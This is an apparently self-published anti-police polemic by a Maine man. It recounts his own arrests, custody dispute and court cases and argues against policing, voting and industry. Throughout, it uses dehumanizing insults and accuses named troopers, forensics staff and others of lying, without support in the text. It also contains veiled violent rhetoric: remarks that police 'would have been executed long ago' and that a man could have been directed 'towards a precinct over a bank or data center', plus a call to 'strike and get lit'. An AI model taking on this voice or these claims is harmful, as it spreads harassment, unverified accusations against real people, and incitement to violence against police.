shouldn’t beg police to destroy others just
because you’re intellectually, emotionally,
mentally, and courageously invalid with no
fortitude. Many people call the police for
petty, trivial, absurd things that should land
the caller in a box if incarceration is
mandatory. The smell of the neighbor’s
BBQ for example. I don’t eat meat. I hate
hunters. However, I don’t use my personal
disgust for human mental defectives as
excuse to send boots after them. I have
had police called on me for being annoying
when the other person was. Two busted
basehead broads in Bangor were bumping
boyz2men on a boombox. I knock on their
door and tell them to be respectful of

others and not to do it anymore. They send
boots after me. Some days later, 3 thugs
were doing the same thing. I couldn’t call
the 2 girls on their garbage behavior but
then hide from the thugs. The thugs turned
it down and said they would keep it down.
Until I got down the street then they
cranked it again. So I had to go back. 3 on
1, the toughest of them pulled a knife. I
advanced not worried about it, he backed
up and they all three brisk-walked down
towards the jail, the way they came with
their stereo off. I am not the toughest
person on the planet. I do however,
sometimes with fear and risk to my body,
try to resolve my own social issues without
involving the nationalist, militant, system
enforcers and sending my enemy’s family
through the Securus, GTEL, Tiger, Aramark,
JPay, CenturyLink, TRULINCS, & ICSolutions
exploitation gauntlet. Who is guilty in those
situations? Who is innocent? Of what?

Every day these issues all across

society. These militant stupids don't have
the skill, intellect, ability, or permission to
sort out our social issues except to profit
for their leash-holding, suit ass masters. If I
had taken the dude's knife and used it on
him, by Maine's arbitrary wording I would
be guilty because I could have, instead of
defending myself, run away and begged

their enforcers to come kill him and do the
things I mentioned about profiteering and
social domination. Watch Chomsky's
lecture on American Imperialism at Boston

Every arrest & court case equals

state revenue and control, furthering social
division. Why? Because you - unable to
resolve your own social issues - got
emotional, wanted to hurt someone without
actually touching them, and instead let the
politicians and their nationalist enforcers
do it. You perfect little 1920s Italian and
1930s German citizen you! If you vote, stop
claiming to resist tyranny. You perpetuate
it while claiming to do the opposite. Your
daily behaviors are complacent while most
around you are suffering. Begging rich
people to solve your social issues with their
police always, eventually results in system
tyranny by its representatives & enforcers.
Many people think Hitler & Mussolini stole
power or conquered with force. Absolutely
not the case. The cheap labor force begged
the tyrants to save them from the rest of
the cheap labor force. When you
dehumanize others in your social
class/caste, you give obscene power to
abusive authority. If someone just broke
into your home and you are dying or they
are, that is a time you call the boots. If

someone doesn't do the boots' work for
them, they couldn't function. They can't get
there in time. You would have to know a
home invasion is coming before it happens
and alert them. The feds couldn't function
without informants.

Police get called 'heroes' just for

doing the bare minimum. For example, by
the state media loudpseaker (Kennebec
Journal/Morning Sentinel/CentralMaine) and
then by social media boot worshipers, one
of the lying boots in my case was
celebrated as a hero for finding a lost guy
that the plow person had already seen. Any
boot on patrol in his luxurious SUV
responding to the call would have found
the person. He was doing the bare
minimum requirement of his job and is
hailed a 'hero'. That's how low the bar is
to be american police 'heroes'. The
indoctrination problem is much more
severely rooted in american minds than I
thought even as little as a year ago. There
are thousands of other people missing that
aren't low-hanging fruits.

3. Authoritarian/boot worship rhetoric.

The Blue Stripe Bandits' groupies

love saying these repeated things as a
weak attempt to 'justify' the system-wide
tyranny by american police. Here are also
their refutations.

1. "Without police enforcing rules, we

wouldn't be safe."

This is false. It is because police

enforce rules that we are not only unsafe
but exist only as purposeless, existentially
unnecessary labor for rich suits. The five
actual monsters the system helps create
and profit from do not justify systemwide
police tyranny and war on the poor.
Extortion enforced with violence is not
safety. That is mafia behavior. Traffic
tickets are extortion through and through.
The first speeding ticket was in 1904. It
does not stop speeding, it just generates
boot revenue to hire more nationalist,
militant enforcers to extort us in traffic
harder. This is morally reprehensible
behavior especially considering that
cars/drivers cause 3700+ deaths daily,
that's not including the wildlife and then
the resources wasted for mostly
unnecessary things.

2. "Brent is just an angry criminal with a
vendetta against police!"

This is false on several levels. First,

anger is not guilt and in fact complacency
is what permits authoritarian abuse of
others. After you question my anger,
please make sure to question your
complacency. Second, I am not a criminal.
The only 'crimes' that would have been
actual crimes against life were they true
were made up by my son's mother in an
emergency custody attempt for state
benefits with her other 4 children from
different fathers. The Silver Bullet strategy
it is called, apparently. They are lies and I
showed so in federal court during Varnell's

trial. I currently have weekends with my
son granted by a separate robed authority.
Evidence is on my site. Third, if I had a
vendetta against police many of them
would have been executed long ago. I
would not have booked Varnell and instead
directed him towards a precinct over a
bank or data center. In this society,
resisting abusive authority that is
exploiting, beating, and killing others gets
you labeled by their cocksockets as having
a vendetta. The police have the vendettas
against certain people and that is shown in
countless examples across society in
recorded conversations, videos, and their
own admissions in them. I can't sit away in
snacks and comfort while so many around
me are suffering. I challenge tyrant
authority when it enters my frame of vision,
interferes with my existence or that of
others, etc. That is not a vendetta. That is
existing causing the least amount of
suffering and stopping injustice when it
rears its oppressive, authoritarian head. In
my videos policing police, you can hear me
saying things like "Fuck, I did NOT want to
DO THIS TODAY!" It is however, morally
mandatory. I cannot, with a conscience
clean, let someone be extorted, oppressed,
and trampled by an authority that was put
in place to protect them, without doing
something to stop it.

3. "Fear, what if, fear, bad guys, fear, flag,
song, fear, hand salute, fear, bald eagle
garbage, fear…"

That one refutes itself. They are

Reinhard Gehlen progeny.

4. "I have family that are nationalist

enforcers, they aren't all bad apples."

First, family bias is no excuse for

what police do to us. Second, they all
enforce the system which dehumanizes us,
exploits us, and replaces us the moment
we die. The few good apples these stupids
are talking about can't do anything or they
get X'd out like all gangs do to those that
betray their tyrant symbolism:

The state has numerous ways to
silence 'malcontents', 'dissenters', 'rebels',
'terrorists', 'lunatics', or any other name
they try to label those they oppress with to
rally the voting(master begging) slaves
against. These authoritarian degenerates
with badges are killing our existence and
removing any chance we have to coexist.
The nationalist enforcers are relentless and
petty. They have met their anti-tyrant, anti-
fascist, anti-communist, anti-nationalist
match. I am ready to strike and get lit. You
should be as well. Tyranny's limits are
always determined by the consent of those
trampled. We are all afraid of them. Some
of us have courage through fear. Others
choose their personal comforts and
conveniences over the suffering of others.
Your complacency and submission is their
obscene authority. The flag-waving mental
invalidity of their worshipers continues it as
well. We are trapped hard but we can
escape this tyrant construct.

Please open your preferred web

browser of choice and go to Google Scholar
[ ]. Then enter this as
your query: american police brutality. Then
do a normal google search for unarmed
black people killed by police.

As you can see, police hating the
lower classes and making up any reason to
kill knowing their people will back them up
in court is not a new issue or a conspiracy
theory. It is a tired, depraved issue that
people complain about until a different rich
suit promises them change in the future.
Rodney King was in 1991. Here is a paper
explaining: "Police Accountability in the
USA: Gaining Traction or Spinning Wheels?"


5. As I state about richterpräsidenten

(robed tyrants) making video evidence of a
murder magically not valid with a wave of
their toy mallet, those that worship
authority and its enforcers do the same
thing. Bootmouths will say either the video
is edited, it doesn't show the beginning
(because everyone knows beforehand
when police are about to gang up on
them), or they make up any bogus excuse
to make it the victim's fault. Free speech
only applies to Blue Stripe Bandits and their
groupies apparently. That's what happens
with gangs. They will say their logo/brand is
never wrong, their clubhouse is never
wrong and try to convince others the same.
Imagine how many black people got
brutalized/killed by police before cameras
and with these people on the jury. For
anyone with a piece of a part of a rational
domepiece, that is a frightening thought.
According to many mentally defective
people in society, violence is acceptable by
police to enforce arbitrary wording &
commands of wealthy suits. Such as not
paying the state to drive your own vehicle
first or fines after. If bootmouths can find

anything "bad" or "negative" someone said
about a person(true or false) in their past
especially in legal paperwork, they can
pretend anything the nationalist enforcers
did, is now. This way, they need do nothing
to stop an injustice that now magically
doesn't exist. Apathy, denial, doctrine,
depravity, dehumanization, xenophobia,
class warfare, fear, and/or broken mental
processing. That is what constitutes a Blue
Stripe Bandit groupie. Ask them about
Uvalde and watch the dereistic thoughts

I submit that American police are a
severe social threat but their worshipers
are just as severe and degenerate. Who are
gods with no one indoctrinated to worship
them? You would think they have never
seen all the movies they cheer for the
oppressed in. I see why entertainment is
such a powerful tool. Cathartic resistance
to tyranny. Everyone just gossips while
police are exploiting and killing us as the
fearful or family biased ones support them.
You can easily translate many bootmouth

"Easier to just pay and go free!"

"Just submit to tyranny and beg their robed

masters later while countless other
injustices are committed by police!"

"Talk nice to police or get beaten!"

"They are heroes for exploiting us and

enforcing social division, you're a crazy
criminal for not worshiping tyrants with

"Your bogus DV charges that neither I nor

the police knew about before stopping and
jumping you, is now excuse for the police
having jumped you."


Let's unpack every bootmouths

comment on that video:

- Their precious constitution says "freedom

of speech".

- The nationalist system enforcers are to

enforce that constitution.

- Nationalist enforcers jumping people for

calling them "nazis" or "schutze" or
"stupid" or "buttass" is a violation of their
precious constitution.

- Nationalist enforcers taking people to jail

for filming is a violation of their precious

- If you go full blue like Chris Wink then the

law does not apply to you.

Sometimes the bootmouths will try to

appear unbiased so they compromise in
their rationale. "The police should have left
him alone but he shouldn't have been
rude!" See how that still backs the
bitchhound blue and makes the victim the
perpetrator? This defends police tyranny,
authoritarian abuse, war on the poor, and

nationalist garbage.

4. Sustainability.

The construct enforced by nationalist,

militant, badged stupids is not sustainable:
Doing one task repetitively(cutting trees or
laying floors), provides things their labor
could never provide, while all state
uniforms and suits do negative labor. In
other words, if they did grueling, intense
labor all day, every day for the rest of their
lives they could not produce what they
enjoy, consume, and use daily. Let's not
forget the paper waste created by this
american paracosm.

A human cutting trees all day != heat

+ food + water + shelter + power + XBox
+ TV + computers + vacuum + pet food +
hygiene + medications + vehicle +
lawnmower + gas + oil + fast food +
entertainment + whatever else they waste
their wages on.

The law of conservation of mass

clearly shows that this garbage is
destroying, consuming, and wasting
resources. All for the material wealth of suit
ass, leash-holding masters making us think
we have to justify an existence we didn't
ask for with manual labor for their luxuries.

The harder resource competition gets, the
more tyrannical the nationalist, militant
enforcers become with the blessings of
their precious, rich masters. Everyone is
conditioned to scramble for federal debt
credits. Unlike the majority of the
population addicted to one thing or
another, I would rather starve to death
than exist as cheap labor so rich people
can throw themselves $100 million dollar
parades and hire boots to keep it going at
all costs to the general public.

From "The law of

conservation of mass is a fundamental
principle of physics. According to this law,
matter can be neither created nor
destroyed. In other words, the mass of an
object or collection of objects never
changes, no matter how the parts are

You don't go do manual labor for

massa then all of a sudden there are
magically more resources available than
there were. It would be nice and politicians
make the stupids think it's possible but it
isn't. That just isn't how existence works.
Here is me challenging a hillbilly that kept
revving his engine blowing past me:

If you notice, when he starts talking about
'having fun' and has no valid refutation for
my challenges to his mentally defective
blue collar doctrine, he peels out again.

An accurate representation of police duties.

5. Logistics.

If you have already been charged

with an arbitrary system infraction by a
nationalist, militant enforcer, "failure to
appear" in front of robed, tyrant authority
so they can expedite system process with
you as the product - leads to them
declaring they now can tyrant you harder.
They use our reactions and resistance to

their tyranny as 'excuse' to trample us
harder, lock us down tighter. They will
absolutely kill you for refusing to pay fines
to their rich master. More incarceration
time, more court dates scheduled to
backlog the system, more revenue
generated from your family just so they can
talk to you on the phone. More court dates,
more paperwork, more charges mean more
hands needed on deck. It's a business of
dehumanization that is expanding rapidly,
consuming everything and everyone in its
path. Some people have garbage attorneys
that don't tell them anything. I never
received my discovery until over a year
later, they had me showing up on days that
weren't even court dates, almost missing
dates, never heard about a plea till months
after they offered it, etc. There are people
that live in other states that have to come
back to a state they were traveling through
because a boot said they went 10mph over
on the interstate. Almost every person I
know would just pay it so they didn't have
to go back. The boots know that. They are
not heroes. Boots aren't making us safe,
they are EXTORTING US. The media
hides it implying only 6% goes to court

6. Tyranny of Hearings.

If you have ever had a 'criminal'

hearing, then you know that as the
defendant, you don't get to speak. The
attorneys are only willing to argue certain
things. Let's unpack this with an example
to show how the system's framework
railroads almost everyone.

1. While fighting this case, my

previous attorney along with Maine State
Forensics (Ann LeBlanc, Liz Brodie, Jennifer
Cohen) said I said things I did not say and
made phone calls that I did not make. All in
legal paperwork for my criminal case. I
have multiple 24/7 recordings on my
property. Now I have a civil suit however, a
richterpräsident will find some centuries
old, unrelated to what happened wording
to protect his fellow state stooge. It never
fails. google Elisens vs Maine State
Forensics. Also you can google Elisens vs
Auburn Community Hospital. They
dismissed the case against ACH because I
moved out of the state. What does that
have to do with guilt/innocence? As with
Adrian Schoolcraft, those that challenge
the state with valid challenges get psych
wards or prison cells.

2. In my court hearings following - I

had ZERO OPPORTUNITY to present that to
the current judges. I demanded my
attorney present that to the court or get off
my case. They filed motion to withdraw.
After filing civil suit I was taken off of the
Title XV incompetency docket. A mental
health eval said I need stricter supervision,
but instead now I am completely
unsupervised on bail. Nothing they do or
say aligns and they can only say "Brent
mean, Brent angry, Brent no like state
tyranny and seeing others suffer so he
crazy or him criminal." They are liars and
get away with it because they are
employed by the state.

3. I demanded a jury trial in

politician/boot worship, statist Maine.
Probably a bad decision but I still stand a
much better chance than with only suit ass
profiteers and tyrants in the courtroom.
Anyone that doesn't worship the state
becomes a 'criminal' that way the only
people allowed to be on the jury are voters,
those that submit to tyrant authority
behind nationalist, symbolic garbage and
dehumanize the others in their own social
class. A prerequisite for being a juror is
never having been victim of the
police/court system. You cannot identify
with those being exploited. You can identify
as a cat or space station if you want,

though. Yes, some people are guilty, but
this system neither gets all the guilty nor
safeguards the innocent from being
wrongfully convicted. Jurors are also
notoriously biased in many, MANY ways:

4. State employees have carte

blanche with no repercussions or
consequences to make up stories about
people to have them incarcerated or
involuntarily committed. American police
and psychiatrists are nothing more than
politician cocksockets. Police lie and
misrepresent with impunity. Psychiatrists
and prosecutors lie and misrepresent with
impunity. Judges permit them to do so.
Judges find any arbitrary wording they can
to say "That video evidence magically
doesn't count!" or "This case from 1971
says we can let our buttonmen off the

7. Bail a.k.a Kidnap for Ransom a.k.a Pay to

Go Free.

Trooper Martin didn't like being called

a militant enforcer enforcing double
standards. This was about my neighbors
demanding they come out for this:
"06:38:11 06/03/22 - Richmond, T -
Caller reporting his neighbor is

standing on the property line yelling
at his workers saying "get to work you
slaves". Not being physical, no
weapons on him." I was being loud
because they were loud. Then they were
back at 5am. Me telling Schutze Martin
this(because he was the same boot from
them calling the day previous), I was
arrested for 'bail violation'. I hurt no one.
Did nothing. Threatened no one. Wasted no
social resources. I went to jail. Oh, such

The pickleback uptop low-level state

stooge ADA from earlier said I plead to the
violation or they recommend another bail
of $560 which I did not have, so I would be
incarcerated because I did not have $560.
Plead or rot in the box. Plead to get out of
the box. Not surprising ~95% of criminal
cases are resolved with plea deals. Pay to
go free in prison/policing for profit america.

Schutze Martin is a religious

nationalist so you know he is State Police
material to the max. How many people do
you know that use the word facetious 5
times in a 20 minute trip? Pretentious,
mentally defective Nazi. The should really
be glad I am not who they try to make me
out to be. Some people though, they don't
have a conscience.

I use personal examples but though
my situation has many unique elements,
the premise is the same. Militant boots

oppress the lower classes behind rich
whims/wording, those being oppressed
react, the boots scream victim and paint an
absolutely false picture using certain
elements of truth, then by the time the
court remedies it(~4.9%) if at all -
thousands of other people have been
victimized by american police just 'doing
their jobs' extorting and killing while doing
photoshoots with puppies and children to
curry public favor. The premise is often a
situation created by the enforced system of
purposeless cheap labor - social strife,
street fights, drugs, bank robberies etc.

I submit, with massive amounts of

evidence, that american police are
domestic terrorists. Their leash-holding suit
ass masters are tyrants. You are out of line
for worshiping either especially if you claim
you care about others. Especially if you
claim to value life.

This final section is from people
asking me, almost every time how I
show their virtue signaling is garbage,
what my solutions are. Here are some

In my previous books/writings I show

how the United States, Russia, China, the
UK, etc are global and domestic, corporate,
authoritarian, war machine tyrants pushing
their depraved existence on anything in
their path and destroying all of life while
conditioning their citizens to accept it and
be proud of it. The state lies with politicians
and propaganda(often while presenting
factual figures) to keep the lower classes
worshiping obscene authority, engaged in
socially divisive activities with their peers,
and bound in xenophobia. Xenophobia
comes with nationalism. If you are ganged
up whether you identify as Blood, Crip,
Republican, Democrat, Chinese, or
American - it's social division with those
around you that are not part of the same
label and are suffering at the same hands
as you. There can be no peace with gangs
that rely on the exploitation, domination,
and/or control of others. If you learn to
stand up for yourself and stop trying to
control others, the obscene authority you
rely on becomes obsolete. See how that
works? No, because you probably still want

the stars and stripes to keep asphyxiating
you as that bald eagle dick is
jackhammering your maxillofacial. What
was that? You had an opinion about a social
issue? Read books first, nationalist invalid.

Bonobos & chimps. Humans are

chimps. Chimps are prone to violence,
gangs, etc while bonobos are peaceful. The
difference? Resource competition.

After presenting irrefutable evidence

for american atrocities committed at home
and globally, those that have the ability to
change their views when valid evidence is
presented always, ALWAYS follow up with
some variant of "Well, what is your
solution then?!" I explain to them that
there is not 'a' solution(that leads to
horrible places socially) and that their
'solutions' usually involve having rich
people use police to exert their will on
others while they continue their destructive
behaviors, in efforts of mitigation vs
resolution. They perpetuate social issues
while claiming to want to solve them. This
writing is the 'solutions' they ask for.

Extremely telling that all those that

claim this is such a great nationalist
boundary are always trying to fix it. Check
that suicide rate compared to other

countries/cultures. Basic needs held
hostage for corporate state servitude is
dehumanizing by default. XBoxes, personal
vehicles, and snacks have them begging
for master to select them to be the ones to
work. If this society is going to continue
with the numbers it has, there are things
that must be done. A common, infantile
response to industry and police tyranny
needing to stop is "YOU go live in the
stone/caveman age if you want! I like
running water and being safe." That
comment is personal luxury, false
perception of reality, going to the opposite
extreme, and apathy. People all over the
planet, even their neighbors go without
running water. Police do not keep us safe.
They keep their rich masters' system safe
while beating, killing, and exploiting us to
do so. Ceasing industry does not mean we
go all the way primitive. Clearly the
commenter has no concern for the
suffering of others. Personal luxury, false
perception of reality, going to the opposite
extreme, and apathy. When it comes to
holding onto their trashheap, any irrational,
junk cognition will do.

1. Basic needs separate from
economy. Applying human Ponzi scheme
arbitrary values to actual, real world
sustenance is not sustainable. Every single
corporate hourly employee does negative
labor. This means that they could not
provide everything they enjoy/use daily if
they worked all day, every day, for the rest
of their lives. Doing tile/carpets over and
over and over does not provide microwave,
phone, vacuum, truck, house, etc. Think
about all of the things required from parts
to electricity to make the microwave
function. Then do the same for all of the
comforts and luxuries they exist with.
Frightening how non-sustainable it is. The
law of conservation of mass. There cannot
be more than there was. Their waste,
excess, and luxuries are someone else's
deficit. Conveniently, they get to insulate
themselves from those that have to carry
the deficit. They also separate them from
one another with socially divisive garbage.
Humans have their one existence stolen by
the corporate state while their peers make
them feel like garbage if they don't allow it:

2. Industry must cease temporarily
while it is refined. When a server is
corrupted it is taken offline while the
situation is remedied. A problem with
current society is that they can't let their
precious manufacturing, waste, and excess
stop for even a moment. They want the
bad things the state is doing to us to
stop...after their personal comforts and
luxuries are accounted for. Self first.
Everyone that knows me, knows I am
neither mentally nor physically lazy. I also
refuse to do purposeless, environmentally
destructive tasks. I use 3 gallons of water
daily, no running water. I built an outhouse
on top of my septic tank. I consume plant
based things. I wear more clothes instead
of running heat. When the power goes out,
I do not turn on a generator. I do laundry
by hand once a week which figures into
that average of 3 gallons daily. I do not
drive. It sucks sometimes, but the families
of those 3700+ people killed daily
understand my decision.

3. Stop voting. How many decades and

police are still killing...the suicide rate is
still shootings haven't
stopped...and you still clock your dumb ass
in to keep it going, making/doing
unnecessary and socially/enironmentally
destructive things. As they throw

themselves $100 million parades and
purchase $1200 fountain pens and $1700
plane tickets to fly their hat. Begging for
masters is why society is so sick. No one
act to stop injustice and suffering, just sign
your name on a piece of paper and clock
back in. No one act, just send an email to
the local suit and then clock back in. No
one act, just walk around with a sign. I am
not advocating for vigilantes. I am
advocating for self-defense regardless of
the gang you claim. If you see others being
beaten, killed, exploited, why would you
NOT move to stop it? Fear & conditioning.
Rich suits are not going to solve our social
issues. They and their families depend on
those social issues indirectly by depending
on the construct that creates them. Stop
begging them to solve those issues with
their police and our taxed to death cheap

4. Movies/television, golf,
motorsports, junkmail, etc must
cease. I am not singling those 'sports' out.
They are the most environmentally
destructive. Every day new movies and
television shows. This is a severe waste of
social resources utilized to dumb that social
populous down. It is not sustainable.
Fashion is one of the biggest environment
killers. Celebrity worship is a problem, refer

to number 3.

5. Countries need to get their military

personnel out of other countries. We
don't solve the disputes, we choose the
side that aligns with our political/economic
interest and then we fund & supply them.
With the exploited cheap labor of our own
citizens, of course. The United States was
founded as an empire and will continue
what it has invested so many innocent lives
in, to keep its tyranny afloat & asoar. By
sea & by air, Uncle Sam is coming to
destroy a simple, one with nature culture
near you. We have 750+ military bases
around the world in over 80 countries.
Russia has only around 40, China has 5. We
exploit lower class countries and then put
on a big show of humanitarian aid sending
bibles and syringes instead of food and
clean water.

Without religion and nationalism,

most of our social problems would not

6. Fear and security should not be

95% of your existence. In the United
States everything revolves around both
because that's how tyranny dominates. It
isn't all whips and chains because
psychological warfare is much more

effective. Why do you think jesus and
muhammed are still a thing? The state
depends on junk cognition and when
someone jumps their fresh to the planet
head into a ridiculous imaginary
world(christianity, islam, republican,
democrat, etc) they hand their existence to
the state. They then make up 'reasons' to
justify their own exploitation. Police and
society are similar to that domestic
violence couple where the man beats and
dominates the woman. You jump in to stop
it and are hailed a hero, yet later she wants
the familiar, the authoritarian tyranny, so
she throws you under the bus and switches
up saying you attacked him. The people
around you(possibly you as well) are best
described by the scene with the woman in
the red dress where one main character
explains to another main character that the
doctors, lawyers, janitors, teachers,
cashiers, etc are so hopelessly dependent
on the system that they will die defending
it, die to protect it. They will fight you and
use any form of irrational thought that
master handed them in order to do so.
They will group up behind their master's
nationalist and/or religious symbolism(all
founded in fear) and incarcerate/kill you.
Everyone claims they know history but
their daily behaviors say they do not, or at
least that they do not understand why

events happened, they just rattle off names
and dates. Social cycles continue. All
socioeconomic systems boil us down to
cheap labor, a commodity. We can exist
together on the planet without what the
corporate state is forcing us to currently

People that beg for rich masters have

no right to complain and are in fact, the
major barrier to the freedom they preach
about. I do not beg for a master. Your
master is attempting domination of free
beings, such as myself, that don't
participate in your paracosm. That is a
major part of the problem. A bunch of lost
and afraid individuals group up and agree
with each other on how the rest of the
planet should be dominated and exploited.
They get badged, militant enforcers to
suppress opposition. This leads to other
groups forming resistance. Then some
groups form resistance but add the same
desire to control the planet. The parchment
the 1776heads worship says you can
abolish a tyrannical government but if you
make a move to overthrow the government
you get the FBI sending you to ADX. The
tyrants will use their force once fear has

Separately but related, I submit that

most debilitating and not so debilitating
mental health issues would be non-existent
were this construct not forced on and
around us. Psychiatric facilities should be
for those who absolutely need it, not for
state punishment to silence opposition or
as a never-ending, unsuccessful mitigation
for system symptoms.

7. Remove government intervention in

family matters(marriage, custody, etc)
exluding the severe abuse cases. There
can be a group to handle mediations
without extorting revenue and dividing the
family to keep generating revenue behind
symbolic garbage and virtue signaling. Who
generates more revenue, a man that works
and provides for his family or a man that
works and pays the mother of his children
while the state gets a cut? How many
people are paying child support? $34
BILLION was owed in child support in 2015.
$2 per transaction plus $35 annually adds
up. 83% of children in single parent homes
live with the mother. You cannot read that
and say that child support is not a method
of forced male labor. Yes it is forced. Some
people say something to the effect of "no
one held a gun to their head!" but as I state
often, ultimatum labor is not voluntary
employment. Correct that no Uncle T is
standing over him with a whip or a rifle

however, if he doesn't do the purposeless
labor and pays the state its $2 per month,
$35 annually, and the arbitrary amount to
the mother, he goes to jail where he will do
the labor for free making uniforms, license
plates, or other things that fund national
wars. Child support based on income helps
the poorest lower class fathers, but it also
means that children with rich fathers get a
lavish existence while those in the lower
class remain there.

8. Basic needs distribution. Slaves say

no one will work while they themselves do
negative labor. Humans made it a long
time without working for rich masters. All
we need is food, water, cool air or warmth,
medical attention when seriously required,
and shelter. Look around you at how many
things are excess and waste. 115,526 retail
food stores in the United States. Then
660,936 restaurants. Then hunters. Then
edible wildlife destroyed by machines. Then
farmland that is used instead for golf
courses. There are more empty homes than
homeless. That is a disgusting amount of
waste when many don't have adequate
sustenance on this planet. Basic needs for
everyone first, then you can play your
fucking PlayStation. Everyone means
everyone, not just your group, your clan,
your nationality, your label.



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